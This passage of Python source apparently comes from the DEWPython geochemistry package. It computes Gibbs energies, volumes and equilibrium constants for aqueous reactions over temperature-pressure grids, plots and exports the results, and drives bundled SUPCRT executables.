self.waterDensity = 1
elif self.WaterFreeEq == 'Integral':
self.waterDensity = 2
else:
self.waterDensity = 3
if self.waterInputs[0][0] == 'yes':
waterLst = []
waterLst2 = []
waterLst.append('H2O')
waterLst.append(self.waterInputs[0][1])
waterLst2.append('H2O')
waterLst2.append(self.waterInputs[0][1])
for i in range(len(self.pressureUsed)):
if self.WaterFreeEq == 'Custom':
try:
if self.GibbsH2O[i] == 0:
waterLst.append(0)
else:
waterLst.append(self.GibbsH2O[i])
except:
waterLst.append(0)
else:
store = DEWEquations.DEWEquations.calculateGibbsOfWater(self.pressureUsed[i], self.tempUsed[i], self.waterDensity, self.equation, self.psat)
waterLst.append(store)
if self.DisplayVol == True:
try:
waterLst2.append(18.01528/self.RhoWatArr[i])
except:
waterLst2.append(0)
continue
else:
waterLst2.append(0)
waterMatInGibbs.append(waterLst)
waterMatInV.append(waterLst2)
if self.waterOutputs[0][0] =='yes':
waterLst = []
waterLst2 = []
waterLst.append('H2O')
waterLst.append(self.waterOutputs[0][1])
waterLst2.append('H2O')
waterLst2.append(self.waterOutputs[0][1])
for i in range(len(self.pressureUsed)):
if self.WaterFreeEq == 'Custom':
try:
if self.GibbsH2O[i] == 0:
waterLst.append(0)
else:
waterLst.append(self.GibbsH2O[i])
except:
waterLst.append(0)
else:
waterLst.append(DEWEquations.DEWEquations.calculateGibbsOfWater(self.pressureUsed[i], self.tempUsed[i], self.waterDensity, self.equation, self.psat))
if self.DisplayVol == True:
try:
waterLst2.append(18.01528/self.RhoWatArr[i])
except:
waterLst2.append(0)
else:
waterLst2.append(0)
waterMatOutGibbs.append(waterLst)
waterMatOutV.append(waterLst2)
if len(waterMatInGibbs) == 0:
waterMatInGibbs = np.zeros((len(self.tKelvin) + 2))
if len(waterMatInV) == 0:
waterMatInV = np.zeros((len(self.tKelvin) + 2))
if len(waterMatOutGibbs) == 0:
waterMatOutGibbs = np.zeros((len(self.tKelvin) + 2))
if len(waterMatOutV) == 0:
waterMatOutV = np.zeros((len(self.tKelvin) + 2))
return waterMatInGibbs, waterMatInV, waterMatOutGibbs, waterMatOutV
def calculate_aq(self):
'''A helper function to calculate the aqueous columns and output them as a matrix. This is called within calculate.'''
aqInGibbs = []
aqOuGibbs = []
aqInV = []
aqOuV = []
for aq in self.inAqMat:
storelst = []
storelst2= []
storelst.append(aq[0])
storelst.append(aq[15])
storelst2.append(aq[0])
storelst2.append(aq[15])
for i in range(len(self.tKelvin)):
storelst.append(aq[2] - aq[4] * (self.tKelvin[i] - T_r)
- aq[11] * (self.tKelvin[i] * np.log(self.tKelvin[i]/T_r) - self.tKelvin[i] + T_r)
- aq[12]*(10**4)*(((1/(self.tKelvin[i]-Theta)) - (1/(T_r-Theta)))*((Theta-self.tKelvin[i])/(Theta))- (self.tKelvin[i]/(Theta*Theta)) * np.log((T_r*(self.tKelvin[i]-Theta))/(self.tKelvin[i]*(T_r-Theta))))
+ aq[7]*(10**-1)*(self.pressureUsed[i]-Pr)
+ aq[8]*(10**2)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr))
+ (1/(self.tKelvin[i]-Theta))*(aq[9]*(self.pressureUsed[i]-Pr)
+ aq[10]*(10**4)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr)))
+ DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*((1/self.DiaArr[i])-1)
- aq[13]*(10**5)*((1/E_PrTr)-1)
+ aq[13]*(10**5)*Upsilon*(self.tKelvin[i]-T_r))
for i in range(len(self.pressureUsed)):
storelst2.append((aq[7]/10 + aq[8]*100/(Psy+self.pressureUsed[i])
+ (aq[9] + aq[10]*10000/(Psy+self.pressureUsed[i]))/(self.tKelvin[i]-Theta)
- DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*(self.QArr[i]*10**-6 )
+ (1/self.DiaArr[i] - 1) * DEWEquations.DEWEquations.calculate_domegadP(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14],self.equation,self.psat))*41.84)
aqInGibbs.append(storelst)
aqInV.append(storelst2)
for aq in self.outAqMat:
storelst = []
storelst2= []
storelst.append(aq[0])
storelst.append(aq[15])
storelst2.append(aq[0])
storelst2.append(aq[15])
for i in range(len(self.tKelvin)):
storelst.append(aq[2] - aq[4] * (self.tKelvin[i] - T_r)
- aq[11] * (self.tKelvin[i] * np.log(self.tKelvin[i]/T_r) - self.tKelvin[i] + T_r)
- aq[12]*(10**4)*(((1/(self.tKelvin[i]-Theta)) - (1/(T_r-Theta)))*((Theta-self.tKelvin[i])/(Theta))- (self.tKelvin[i]/(Theta*Theta)) * np.log((T_r*(self.tKelvin[i]-Theta))/(self.tKelvin[i]*(T_r-Theta))))
+ aq[7]*(10**-1)*(self.pressureUsed[i]-Pr)
+ aq[8]*(10**2)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr))
+ (1/(self.tKelvin[i]-Theta))*(aq[9]*(self.pressureUsed[i]-Pr)
+ aq[10]*(10**4)*np.log((Psy+self.pressureUsed[i])/(Psy+Pr)))
+ DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*((1/self.DiaArr[i])-1)
- aq[13]*(10**5)*((1/E_PrTr)-1)
+ aq[13]*(10**5)*Upsilon*(self.tKelvin[i]-T_r))
for i in range(len(self.pressureUsed)):
storelst2.append((aq[7]/10 + aq[8]*100/(Psy+self.pressureUsed[i])
+ (aq[9] + aq[10]*10000/(Psy+self.pressureUsed[i]))/(self.tKelvin[i]-Theta)
- DEWEquations.DEWEquations.calculateOmega(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14])*(self.QArr[i]*10**-6 )
+ (1/self.DiaArr[i] - 1) * DEWEquations.DEWEquations.calculate_domegadP(self.pressureUsed[i],self.tempUsed[i],self.RhoWatArr[i],aq[0],aq[13]*(10**5),aq[14],self.equation,self.psat))*41.84)
aqOuGibbs.append(storelst)
aqOuV.append(storelst2)
if len(aqInGibbs) == 0:
aqInGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(aqOuGibbs) == 0:
aqOuGibbs = [np.zeros(len(self.tKelvin) + 2)]
if len(aqInV) == 0:
aqInV = [np.zeros(len(self.tKelvin) + 2)]
if len(aqOuV) == 0:
aqOuV = [np.zeros(len(self.tKelvin) + 2)]
return aqInGibbs, aqOuGibbs, aqInV, aqOuV
def calculate(self):
'''The function called that will update all of the parameters. It has no outputs, but allows certain arrays to be queried.
'''
self.calculate_matrices()
self.waterInpGibbs, self.waterInpV, self.waterOutGibbs, self.waterOutV = self.calculate_H2O()
self.aqInpGibbs, self.aqOutGibbs, self.aqInpV, self.aqOutV = self.calculate_aq()
self.gasInpGibbs, self.gasOutGibbs, self.gasInpV, self.gasOutV = self.calculate_gas()
G1 = np.delete(np.asarray(self.waterInpGibbs), [0,1]).astype(float) * int(self.waterInputs[0][1])
V1 = np.delete(np.asarray(self.waterInpV), [0,1]).astype(float) * int(self.waterInputs[0][1])
G4 = np.delete(np.asarray(self.waterOutGibbs), [0,1]).astype(float) * int(self.waterOutputs[0][1])
V4 = np.delete(np.asarray(self.waterOutV), [0,1]).astype(float) * int(self.waterOutputs[0][1])
# Gas Loops
G3, V3 = ([], [])
for i in range(len(self.gasInpGibbs)):
G3.append(np.multiply(np.delete(np.asarray(self.gasInpGibbs[i]), [0,1]).astype(float), int(self.gasInpGibbs[i][1])))
V3.append(np.multiply(np.delete(np.asarray(self.gasInpV[i]), [0,1]).astype(float), int(self.gasInpV[i][1])))
G3 = np.sum(G3, axis = 0)
V3 = np.sum(V3, axis = 0)
G6, V6 = ([], [])
for i in range(len(self.gasOutGibbs)):
G6.append(np.multiply(np.delete(np.asarray(self.gasOutGibbs[i]), [0,1]).astype(float), int(self.gasOutGibbs[i][1])))
V6.append(np.multiply(np.delete(np.asarray(self.gasOutV[i]), [0,1]).astype(float), int(self.gasOutV[i][1])))
G6 = np.sum(G6, axis = 0)
V6 = np.sum(V6, axis = 0)
# Aqueous Inputs
G2, V2 = ([], [])
for i in range(len(self.aqInpGibbs)):
G2.append(np.multiply(np.delete(np.asarray(self.aqInpGibbs[i]), [0,1]).astype(float), int(self.aqInpGibbs[i][1])))
V2.append(np.multiply(np.delete(np.asarray(self.aqInpV[i]), [0,1]).astype(float), int(self.aqInpV[i][1])))
G2 = np.sum(G2, axis = 0)
V2 = np.sum(V2, axis = 0)
G5, V5 = ([], [])
for i in range(len(self.aqOutGibbs)):
G5.append(np.multiply(np.delete(np.asarray(self.aqOutGibbs[i]), [0,1]).astype(float), int(self.aqOutGibbs[i][1])))
V5.append(np.multiply(np.delete(np.asarray(self.aqOutV[i]), [0,1]).astype(float), int(self.aqOutV[i][1])))
G5 = np.sum(G5, axis = 0)
V5 = np.sum(V5, axis = 0)
dG = [np.sum([G4, G5, G6], axis = 0) - np.sum([G1, G2, G3], axis = 0)]
dV = [np.sum([V4, V5, V6], axis = 0) - np.sum([V1, V2, V3], axis = 0)]
# Adding the mineral contributions if they exist, must be at the same temperatures and pressures
if len(self.mineralInputs) > 0:
for i in range(len(self.mineralInputs)):
if self.psat == False:
myMinPath = mineralDictionary2
else:
myMinPath = mineralDictionary
for temp in self.tempUsed:
self.mineralInpGibbs.append(np.multiply(myMinPath[self.mineralInputs[i][0]]['delG'][myMinPath[self.mineralInputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
self.mineralInpV.append(np.multiply(myMinPath[self.mineralInputs[i][0]]['delV'][myMinPath[self.mineralInputs[i][0]]['Temperature'].index(temp)], int(self.mineralInputs[i][1])))
dG = np.sum([dG, np.sum([self.mineralInpGibbs], axis = 0)], axis = 0)
dV = np.sum([dV, np.sum([self.mineralInpV], axis = 0)], axis = 0)
if len(self.mineralOutputs) > 0:
for i in range(len(self.mineralOutputs)):
if self.psat == False:
myMinPath = mineralDictionary2
else:
myMinPath = mineralDictionary
for temp in self.tempUsed:
self.mineralOutGibbs.append(np.multiply(myMinPath[self.mineralOutputs[i][0]]['delG'][myMinPath[self.mineralOutputs[i][0]]['Temperature'].index(temp)], int(self.mineralOutputs[i][1])))
self.mineralOutV.append(np.multiply(myMinPath[self.mineralOutputs[i][0]]['delV'][myMinPath[self.mineralOutputs[i][0]]['Temperature'].index(temp)], int(self.mineralOutputs[i][1])))
dG = np.sum([dG, -np.sum([self.mineralOutGibbs],axis = 0)], axis = 0)
dV = np.sum([dV, -np.sum([self.mineralOutV],axis = 0)], axis = 0)
self.logK = []
self.delG = []
self.delV = []
for i in range(len(dG[0])):
self.logK.append([-dG[0][i]/(2.302585*self.tKelvin[i]*bigR), self.tempUsed[i], self.pressureUsed[i]])
self.delG.append([dG[0][i], self.tempUsed[i], self.pressureUsed[i]])
self.delV.append([dV[0][i], self.tempUsed[i], self.pressureUsed[i]])
# Sets plotting arrays for convenient plotting of isotherms/isobars
if self.ptInput!= 'Psat' or self.psat == False:
self.pressRed = list(set(self.pressureUsed))
self.tempRed = list(set(self.tempUsed))
self.pressRed.sort()
self.tempRed.sort()
temppLogK = defaultdict(list)
temppDelG = defaultdict(list)
temppDelV = defaultdict(list)
temptLogK = defaultdict(list)
temptDelG = defaultdict(list)
temptDelV = defaultdict(list)
for logK, temp, pressure in self.logK:
temppLogK[pressure].append(logK)
temptLogK[temp].append(logK)
for delG, temp, pressure in self.delG:
temppDelG[pressure].append(delG)
temptDelG[temp].append(delG)
for delV, temp, pressure in self.delV:
temppDelV[pressure].append(delV)
temptDelV[temp].append(delV)
for item in temppDelG:
self.pDelG.append(temppDelG[item])
for item in temppDelV:
self.pDelV.append(temppDelV[item])
for item in temppLogK:
self.pLogK.append(temppLogK[item])
for item in temptDelG:
self.tDelG.append(temptDelG[item])
for item in temptDelV:
self.tDelV.append(temptDelV[item])
for item in temptLogK:
self.tLogK.append(temptLogK[item])
return
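# After calculate() the result arrays hold [value, temperature (deg C), pressure (bar)] rows, e.g.
# self.logK[0] -> [logK at the first T-P point, T, P]; self.delG and self.delV follow the same layout.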
###############################
####### Methods to auto #######
###############################
def set_tp(self, pt_arr):
'''Sets the T-P values like set_TPRho, but automated for the run helper function. Can also be used on its own to quickly set T-P values from a pt_arr argument instead of prompts.'''
pressArr = []
tempArr = []
self.RhoWatArr = []
self.DiaArr = []
self.QArr =[]
self.gibbsLst = []
self.logK = []
self.vLst = []
self.delG = []
self.delV = []
if self.ptInput == "Custom":
ptSheet =pd.read_csv(inpPath,encoding= 'unicode_escape', header = None)
ptFinder = ptSheet.to_numpy()
tempArr = [float(i[1]) for i in ptFinder[4:]]
pressArr = [float(i[0]) for i in ptFinder[4:]]
elif self.ptInput == "Regular":
try:
templow = pt_arr[0][0]
temphigh =pt_arr[0][1]
tempstep = pt_arr[0][2]
pmin = pt_arr[1][0]
pmax = pt_arr[1][1]
pstep = pt_arr[1][2]
except ValueError:
print('Your PT array is not formatted correctly. Please use the format [[tmin, tmax, tstep], [pmin, pmax, pstep]]')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
parrHelp = np.arange(start= pmin, stop = pmax + 1, step = pstep)
for i in range(len(parrHelp)):
pressArr.append([parrHelp[i]]* len(tempArr))
pressArr = np.multiply(pressArr, 1000)
tempArr = [tempArr] * len(parrHelp)
elif self.ptInput == "Psat":
try:
templow = pt_arr[0]
temphigh = pt_arr[1]
tempstep = pt_arr[2]
validBool = True
except ValueError:
print('Your input is not formatted correctly. Please use the format for psat of [tmin, tmax, tstep]')
tempArr = np.arange(start= templow, stop = temphigh + 1, step = tempstep)
for i in range(len(tempArr)):
if tempArr[i] < 100:
pressArr.append(1)
else:
pressArr.append(2.1650906415E-11*np.double(tempArr[i])**5 + 0.0008467019353*np.double(tempArr[i])**2 - 0.17973651666*tempArr[i] + 10.7768850763807)
else:
# If I've done the checking correctly above it should never reach this
raise ValueError("You have not set your options yet, please set them before continuing")
self.tempUsed = np.ndarray.flatten(np.asarray(tempArr))
self.pressureUsed = np.ndarray.flatten(np.asarray(pressArr))
self.tKelvin = np.add(self.tempUsed, 273.15)
# code to set options in a way the equations can understand
if self.ptInput == "Psat":
self.psat = True
else:
self.psat = False
if self.RhoOfWater =='Z&D 2005':
self.equation = 1
elif self.RhoOfWater == 'Z&D 2009':
self.equation = 2
else:
self.equation = 3
if self.dielectricEq == "Supcrt":
self.diaEq = 1
elif self.dielectricEq == "Franck":
self.diaEq = 2
elif self.dielectricEq == "Fernandez":
self.diaEq = 3
elif self.dielectricEq == "Sverjensky":
self.diaEq = 4
else:
self.diaEq = 5
# write code to take in custom Rho, G, and Water Values here
self.densityCollection = np.asarray(self.densityCollection).astype(float)
self.dielectricCollection = np.asarray(self.dielectricCollection).astype(float)
self.gibbsCollection = np.asarray(self.gibbsCollection).astype(float)
# Sets the water density array
for i in range(len(self.pressureUsed)):
# For the custom array
if self.RhoOfWater =="Custom" or (self.forceCustom == True and self.pressureUsed[i] < 1000):
idx = np.intersect1d(np.where(np.asarray(self.densityCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.densityCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.densityCollection[idx][2]):
self.RhoWatArr.append(self.densityCollection[idx][2])
else:
self.RhoWatArr.append(0)
else:
self.RhoWatArr.append(DEWEquations.DEWEquations.calculateDensity(self.pressureUsed[i], self.tempUsed[i], self.equation, 0.01, self.psat))
# Sets the dielectric constant array
for i in range(len(self.pressureUsed)):
# for the custom array
if self.dielectricEq == "Custom":
idx = np.intersect1d(np.where(np.asarray(self.dielectricCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.dielectricCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.dielectricCollection[idx][2]):
self.DiaArr.append(self.dielectricCollection[idx][2])
else:
self.DiaArr.append(0)
else:
if self.ForceSupcrt == True and self.pressureUsed[i] < 5000 and self.psat == False:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], 1, self.psat))
else:
self.DiaArr.append(DEWEquations.DEWEquations.calculateEpsilon(self.RhoWatArr[i], self.tempUsed[i], self.diaEq, self.psat))
# Sets up the Q array
for i in range(len(self.pressureUsed)):
if self.DisplayVol == True:
try:
self.QArr.append(float(DEWEquations.DEWEquations.calculateQ(self.pressureUsed[i], self.tempUsed[i], self.RhoWatArr[i], self.equation, self.diaEq, self.psat))*np.double(10)**6)
except:
self.QArr.append(0)
else:
self.QArr.append(0)
# Sets up custom Gibbs of Water Array:
if self.WaterFreeEq == "Custom":
for i in range(len(self.pressureUsed)):
idx = np.intersect1d(np.where(np.asarray(self.gibbsCollection).astype(float) == self.pressureUsed[i]/1000), np.where(np.asarray(self.gibbsCollection).astype(float) == self.tempUsed[i]))[0]
if not np.isnan(self.gibbsCollection[idx][2]):
self.GibbsH2O.append(self.gibbsCollection[idx][2])
else:
self.GibbsH2O.append(0)
return
def run(self, pt_arr, min_inp =[], aq_inp = [], g_inp = [], h2o_inp = 0, min_out = [],aq_out =[], g_out = [],h2o_out = 0,
ptInp = 'Psat', rhoWat = 'Z&D 2005', forceBool = False, dieEQ = 'Supcrt', forceSC = True,
WFEQ ='D&H 1978', dsV = True, pdsV = True, DV = True, EQ = 1, dEQ = 1, pst = True, mWn = 1, makeP = False):
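'''Automated driver: sets the inputs, outputs, and option attributes from the arguments, then calls
set_tp and calculate (and make_plots if makeP is True). pt_arr uses the same formats as set_tp:
[tmin, tmax, tstep] for Psat runs, or [[tmin, tmax, tstep], [pmin, pmax, pstep]] (pressures in kb)
for Regular runs. The species arguments are lists of [name, multiplier] pairs; h2o_inp and h2o_out
are integer water multipliers (0 means water is not used). The remaining keyword arguments set the
same option attributes described in __init__.'''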
if h2o_inp > 0:
self.waterInputs = [['yes',h2o_inp]]
else:
self.waterInputs = [['no',0]]
if h2o_out > 0:
self.waterOutputs = [['yes',h2o_out]]
else:
self.waterOutputs = [['no',0]]
self.mineralInputs = min_inp
self.aqueousInputs = aq_inp
self.gasInputs = g_inp
self.mineralOutputs = min_out
self.aqueousOutputs = aq_out
self.gasOutputs = g_out
self.ptInput = ptInp
self.RhoOfWater = rhoWat
self.forceCustom = forceBool
self.dielectricEq = dieEQ
self.ForceSupcrt = forceSC
self.WaterFreeEq = WFEQ
self.DisplayVolOpt = dsV
self.PsatDisplayVol = pdsV
self.DisplayVol = DV
self.equation = EQ
self.diaEq = dEQ
self.psat = pst
self.waterDensity = mWn
# to actually run:
self.set_tp(pt_arr)
self.calculate()
if makeP == True:
self.make_plots()
return
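############ ILLUSTRATIVE EXAMPLE: AUTOMATED RUN ##################################
# A sketch only; the species names are placeholders and must exist in the bundled aqueous list.
# model = DEW()
# model.run([100, 400, 50],                        # Psat run from 100 to 400 C in 50 C steps
#           aq_inp=[['CO2,AQ', '1']], h2o_inp=1,   # reactants: 1 CO2,aq + 1 H2O
#           aq_out=[['HCO3-', '1'], ['H+', '1']])  # products: 1 HCO3- + 1 H+
# model.export_to_csv()                            # or model.make_plots()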
###### MAKE PLOTS###########
def make_plots(self):
'''A final function that the user calls to reproduce the plots available in the Deep Earth Water Model Excel spreadsheet.'''
plt.clf()
###### PSAT PLOTS #######
if self.psat == True or self.ptInput =='Psat':
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.logK])
plt.xlabel('Pressure (bar)')
plt.ylabel('LogK')
plt.title('Pressure vs. LogK Psat Curve')
plt.show()
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.delG])
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$G')
plt.title('Pressure vs. $\Delta$G Psat Curve')
plt.show()
plt.figure()
plt.plot(self.pressureUsed, [i[0] for i in self.delV])
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$V')
plt.title('Pressure vs. $\Delta$V Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.logK])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('LogK')
plt.title('Temperature vs. LogK Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.delG])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('$\Delta$G')
plt.title('Temperature vs. $\Delta$G Psat Curve')
plt.show()
plt.figure()
plt.plot(self.tempUsed, [i[0] for i in self.delV])
plt.xlabel('Temperature ($^\circ$ C)')
plt.ylabel('$\Delta$V')
plt.title('Temperature vs. $\Delta$V Psat Curve')
plt.show()
####### NON PSAT PLOTS ########
else:
# T Plots
plt.figure()
for i in self.pDelG:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('$\Delta$G')
plt.title('Temperature vs. $\Delta$G')
plt.show()
plt.figure()
for i in self.pDelV:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('$\Delta$V')
plt.title('Temperature vs. $\Delta$V')
plt.show()
plt.figure()
for i in self.pLogK:
plt.plot(self.tempRed, i)
plt.legend(self.pressRed,bbox_to_anchor=(1.05, 1), title = 'Pressure (bar)', loc='upper left')
plt.xlabel('Temperature ($^\circ$C)')
plt.ylabel('LogK')
plt.title('Temperature vs. LogK')
plt.show()
# P Plots
plt.figure()
for i in self.tDelG:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$G')
plt.title('Pressure vs. $\Delta$G')
plt.show()
plt.figure()
for i in self.tDelV:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('$\Delta$V')
plt.title('Pressure vs. $\Delta$V')
plt.show()
plt.figure()
for i in self.tLogK:
plt.plot(self.pressRed, i)
plt.legend(self.tempRed,bbox_to_anchor=(1.05, 1), title = 'Temperature ($^\circ$C)', loc='upper left')
plt.xlabel('Pressure (bar)')
plt.ylabel('LogK')
plt.title('Pressure vs. LogK')
plt.show()
return
#############################
######### OTHER #############
#############################
def export_to_csv(self):
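'''Writes the calculated Temperature, Pressure, delV, delG, and LogK columns to a CSV file whose
name (without extension) is taken from a user prompt. Requires calculate() to have been run first.'''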
dV = [row[0] for row in self.delV]
dG = [row[0] for row in self.delG]
lK = [row[0] for row in self.logK]
T = [row[1] for row in self.logK]
P = [row[2] for row in self.logK]
output_array = np.column_stack([T,P, dV,dG,lK])
df = pd.DataFrame(output_array)
df.columns = ['Temperature','Pressure','delV','delG','LogK']
name = input('Input the name of the CSV file')
finalName = name + ".csv"
df.to_csv(finalName, index = False)
def options(self):
print('Welcome to DEWPython, here are the options you can run:')
print('1. DEW(): this initializes a Deep Earth Water Model Object')
print(' -The DEW object requires the set_inputs, set_outputs, set_TPRho, and calculate methods to be run.')
print(' -You can also utilize the import_custom_sheets method to import custom CSV data')
print(' -After calculating you can use the make_plots or export_to_csv methods.')
print('2. run_supcrt: this initializes an inline run of SUPCRTBL')
print(' -After initializing the SUPCRTBL object, run calculate_supcrt to store the supcrt outputs in arrays')
print(' -You can also use run_supcrt on a supcrt output file that has already been run by adding the optional argument of the file name')
print(' -After this you can run make_supcrt_plots to plot the supcrt files akin to a DEW run')
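############ ILLUSTRATIVE EXAMPLE: TYPICAL INTERACTIVE WORKFLOW ##################################
# A sketch of the sequence described above (prompts drive each step):
# model = DEW()
# model.set_inputs(); model.set_outputs()    # choose reactant and product species
# model.set_preferences()                    # optional: change equations/options from the defaults
# model.set_TPRho()                          # choose the T-P grid and compute water properties
# model.calculate()                          # populate logK, delG, delV
# model.make_plots(); model.export_to_csv()  # visualise or save the results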
######################################
####### METHODS FOR SUPCRT ###########
######################################
def outLoop(self):
'''A helper function to allow SUPCRTBL to run'''
running = True
while(running):
line = self.pout.readline().decode(sys.stdout.encoding)
print(line, end='')
running='\n' in line
print('Finished')
def outLoop2(self):
'''A helper function to allow SUPCRT96 to run'''
running = True
while(running):
line = self.pout.readline().decode(sys.stdout.encoding)
running='\n' in line
def run_supcrt(self, version = '96'):
'''A function that runs the pre-compiled SUPCRT96 (default) or SUPCRTBL executable bundled in the resources folder'''
if version != '96':
sup_path = '/'.join(('resources', 'SUPCRTBL.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
else:
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
self.proc = subprocess.Popen(supPath,shell = True, stdout = subprocess.PIPE, stdin = subprocess.PIPE, stderr = subprocess.STDOUT)
self.pout = self.proc.stdout
self.pin = self.proc.stdin
threading.Thread(target=self.outLoop).start()
while(self.proc.poll() is None):
var = input('User Input: ')
if '.txt' in var:
self.supcrtFile = op.dirname(op.abspath(__file__)) + '\\resources\\' + var
inp=bytearray(var +'\n', sys.stdin.encoding)
if(self.proc.poll() is None):
self.pin.write(inp)
self.pin.flush()
return
def calculate_supcrt_special(self, customFile = None):
'''Calculates the output from either SUPCRTBL/SUPCRT96 at isothermal/isobaric temperatures'''
returnLst = {}
if customFile != None:
filename = op.dirname(op.abspath(os.getcwd()))+ '\\' + customFile
elif self.supcrtFile is None or len(self.supcrtFile) == 0:
raise ValueError("You haven't run SUPCRT yet")
else:
filename = self.supcrtFile
with open(filename, 'r') as f:
impor = f.read()
import_data = impor.replace('\t', ' ')
split = import_data.split('\n')
for i in range(len(split)):
try:
if 'ISOTHERMS(degC)' in split[i]:
finalTemp = " ".join(split[i].split()).split(' ')[5]
finalPress = " ".join(split[i+1].split()).split(' ')[6]
returnVar = input('Enter reaction title')
except:
continue
if 'STANDARD STATE PROPERTIES OF THE REACTION AT ELEVATED TEMPERATURES AND PRESSURES' in split[i]:
subLst = []
temp = []
pres = []
DH2 = []
lgK = []
dlG = []
dlH = []
dlS = []
dlV = []
dlCp = []
subDict = {}
for item in split[(i+4):]:
if len(item) > 0:
subLst = (" ".join(item.split())).split(' ')
try:
float(subLst[0])
except:
continue
try:
a = subLst[0]
b = subLst[1]
c = subLst[2]
d = subLst[3]
e = subLst[4]
f = subLst[5]
g = subLst[6]
h = subLst[7]
i = subLst[8]
temp.append(a)
pres.append(b)
DH2.append(c)
lgK.append(d)
dlG.append(e)
dlH.append(f)
dlS.append(g)
dlV.append(h)
dlCp.append(i)
if float(subLst[0]) == float(finalTemp) and float(subLst[1]) == float(finalPress):
break
except:
continue
subDict['Temperature'] = [float(i) for i in temp]
subDict['Pressure'] = [float(i) for i in pres]
DH2Lst = []
lgKLst = []
dlGLst = []
dlHLst = []
dlSLst = []
dlVLst = []
dlCpLst = []
for i in range(len(DH2)):
try:
DH2Lst.append(float(DH2[i]))
except:
DH2Lst.append(0)
try:
lgKLst.append(float(lgK[i]))
except:
lgKLst.append(0)
try:
dlGLst.append(float(dlG[i]))
except:
dlGLst.append(0)
try:
dlHLst.append(float(dlH[i]))
except:
dlHLst.append(0)
try:
dlSLst.append(float(dlS[i]))
except:
dlSLst.append(0)
try:
dlVLst.append(float(dlV[i]))
except:
dlVLst.append(0)
try:
dlCpLst.append(dlCp[i])
except:
dlCpLst.append(0)
subDict['DH2O'] = DH2Lst
subDict['LogK'] = lgKLst
subDict['delG'] = dlGLst
subDict['delH'] = dlHLst
subDict['delS'] = dlSLst
subDict['delV'] = dlVLst
subDict['delCp'] = dlCpLst
returnLst[returnVar] = subDict
self.supcrtOut = returnLst
def supcrt_inp(self, rxn_lst, title, reaction_type = 'psat'):
'''Takes a list of reaction lists (comprised of tuples) and runs supcrt'''
for reaction in rxn_lst:
sup_path = '/'.join(('resources', 'supcrt96.exe'))
supPath = pkg_resources.resource_filename(resource_package, sup_path)
self.proc = subprocess.Popen(supPath,stdout=subprocess.PIPE, stdin=subprocess.PIPE,stderr=subprocess.STDOUT, shell=True)
self.pout = self.proc.stdout
self.pin = self.proc.stdin
it = 0
rxnVar = 'realReac.con'
if reaction_type != 'psat':
rxnVar = 'Xtend.con'
if len(title) < 1:
title = input('What is the title of your reaction?')
comm = ['n', 'updateSlop1.dat', '2', rxnVar, '2', '1', title]
for component in reaction:
if component[1] not in nameLst:
                    print(str(component[1]) + ' is not in the slop16 database. Please check your spelling and try again. You can use the search function to query the database.')
else:
comm.append(str(component[0]) + ' ' + component[1])
comm.append('0')
comm.append('y')
comm.append('n')
comm.append(title + '.txt')
comm.append('1')
comm.append('1')
comm.append('empty')
threading.Thread(target=self.outLoop2).start()
while(self.proc.poll() is None):
try:
inp = comm[it]
it += 1
# inp = bytearray(input('User Input: ')+'\n',sys.stdin.encoding)
if(self.proc.poll() is None):
self.pin.write(bytearray(inp+'\n',sys.stdin.encoding))
self.pin.flush()
except:
pass
return
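    # Hedged usage sketch for supcrt_inp (the reaction below is illustrative, not from
    # the source): each reaction is a list of (coefficient, species-name) tuples, with
    # species names matching entries in nameLst (the slop database listing).
    #   rxns = [[(-1, 'QUARTZ'), (1, 'SiO2,aq')]]      # hypothetical reaction
    #   obj.supcrt_inp(rxns, 'ExampleReaction')        # obj: an instance of this class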
def calculate_supcrt(self, customFile = None):
        '''Parses thermodynamic properties from a SUPCRTBL output file in the same directory. The user must enter the
        maximum temperature and pressure so the parser knows where each reaction block ends.
'''
returnLst = {}
